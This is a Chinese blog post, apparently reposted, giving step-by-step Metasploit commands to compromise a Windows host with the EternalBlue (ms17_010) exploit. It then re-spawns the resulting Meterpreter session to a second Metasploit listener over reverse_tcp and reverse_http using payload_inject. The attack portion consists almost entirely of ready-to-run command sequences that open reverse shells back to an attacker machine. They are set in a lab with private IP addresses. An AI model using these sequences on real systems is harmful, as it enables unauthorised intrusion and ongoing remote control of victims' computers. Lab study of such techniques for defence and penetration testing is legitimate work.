码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit


    首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ip

    1. set autorunscript post/windows/manage/migrate name=services.exe
    2. set payload windows/x64/meterpreter/reverse_tcp
    3. set lport 5577
    4. set lhost 192.168.50.130
    5. use exploit/windows/smb/ms17_010_eternalblue
    6. set rhost 192.168.50.146
    7. set rport 445
    8. exploit -j -z

    接下来在另外的msf里,做好监听3333:

    handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp

    然后在上面的meterpreter 里:

    1. use exploit/windows/local/payload_inject
    2. set payload windows/meterpreter/reverse_tcp
    3. set lhost 192.168.50.130
    4. set lport 3333
    5. set DisablePayloadHandler True
    6. set PrependMigrate True
    7. set session 1
    8. run

    这样就可以退出使用ms17_010拿下的session了

    如上使用的是reverse_tcp,其实reverse_http,也是一样的可以:

    在另外的msf里,做好监听7777:

    1. use exploit/multi/handler
    2. set payload windows/meterpreter/reverse_http
    3. set lhost 192.168.50.130
    4. set lport 18080
    5. set ExitOnSession false
    6. set SessionExpirationTimeout 0
    7. set SessionCommunicationTimeout 0
    8. exploit -j -z

    然后在旧session里派生:

    1. use exploit/windows/local/payload_inject
    2. set payload windows/meterpreter/reverse_http
    3. set lhost 192.168.50.130
    4. set lport 18080
    5. set DisablePayloadHandler True
    6. set PrependMigrate True
    7. set session 1
    8. run

    run后大概需要15-20秒才能完全建立新session.

  • 相关阅读:
    wpf 和winform 的区别
    详解AVL树(二叉搜索平衡树)【C++实现】
    简单了解一下国产操作系统
    用Aspose-Java免费实现 PDF、Word、Excel、Word互相转换并将转换过得文件上传OSS,返回转换后的文件路径
    一文读懂python中mpi4py的所有基础使用
    教你用JavaScript实现随机点名
    2.12 Catboost
    代码随想录-刷题第一天
    python变量与运算符
    大模型时代的具身智能系列专题(九)
  • 原文地址:https://blog.csdn.net/qq_29060627/article/details/133805372
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号